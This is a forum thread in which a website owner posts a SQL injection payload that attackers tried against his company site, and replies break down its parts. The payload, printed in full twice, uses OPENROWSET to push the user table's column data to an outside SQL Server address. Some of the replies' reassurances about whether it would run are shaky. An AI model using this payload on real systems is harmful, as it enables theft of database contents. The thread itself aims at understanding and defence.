INSERT INTO OPENROWSET ('SQLOLEDB','UID=as) <INSERT INTO OPENROWSET ('SQLOLEDB','UID=as)>; PWD= <PWD=>; NETWORK=DBMSSOCN <NETWORK=DBMSSOCN>; ADDRESS=111.22.333.44 <ADDRESS=111.22.333.44>; 1433 <1433>; ' <'>; 'SELECT * FROM SQUARE.._columns') SELECT * FROM .INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tbl_users' ORDER BY ORDINAL_POSITION <'SELECT * FROM SQUARE.._columns') SELECT * FROM .INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tbl_users' ORDER BY ORDINAL_POSITION>; --sp_useradmin <--sp_useradmin>
I found this sql that was attempted to be run via sql injection due to a vulnerability on one of my pages on my company website. After doing some research I recognize that they seem to be trying to dump data into a remote sql server...I am not sure whatall of this means though. Can anyone help me understand what all of it means ? I have a good understanding of SQL but I am certainly not an expert. Any replies would be greatly appreciated. I do understand how sql injection works but I am not sure if this statement would even run.
1433 <1433> SQL Server TCP/IP port I keep telling people not to use it to access SQL Server in all my 8years I have not had reason to use it.
NETWORK=DBMSSOCN dbmssocn - Win32 Winsock TCP/IP
INSERT INTO OPENROWSET Used to connect to other database systems like Oracle, IBM, but also used by Access and Excel
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME ANSI SQL defined System catalog for inter database system communication.
I don't think it can dump data into SQL Server it can only do it if the person creating the database is not skilled. The first two can harm you the later Openrowset require permissions to run and schema is not useful if you don't know the internal structure of the database in question. The main thing the person doing it is not skilled or knowledgable about databases. Post again if you still have questions. Hope this helps.
|||thanks for your answer. The person who eventually ran this query via sql injection did know all of my tablenames by performing a query against one of the system tables.
I really need help here from anyone who is very knowledgeable with these type of attacks. If someone can point me in the right direction I would greatly appreciate..
|||
(INSERT INTO OPENROWSET ('SQLOLEDB','UID=as) <INSERT INTO OPENROWSET ('SQLOLEDB','UID=as)>; PWD= <PWD=>;
Will not run without a valid password)
(NETWORK=DBMSSOCN <NETWORK=DBMSSOCN>
ADDRESS=111.22.333.44 <ADDRESS=111.22.333.44>; 1433 <1433>
Connection through sockets could be dangerous)
(' <'>; 'SELECT * FROM SQUARE.._columns') SELECT * FROM .INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tbl_users' ORDER BY ORDINAL_POSITION <'SELECT * FROM SQUARE.._columns') SELECT * FROM .INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tbl_users' ORDER BY ORDINAL_POSITION>; --sp_useradmin <--sp_useradmin>)
These are not related to system tables. If they attacked you through systems tables you have not posted that code here. How ever try the links below for some info about injections and how to prevent them. Hope this helps.
http://weblogs.asp.net/scottgu/archive/2006/09/30/Tip_2F00_Trick_3A00_-Guard-Against-SQL-Injection-Attacks.aspx
http://forums.asp.net/2/1423664/ShowThread.aspx#1423664
No comments:
Post a Comment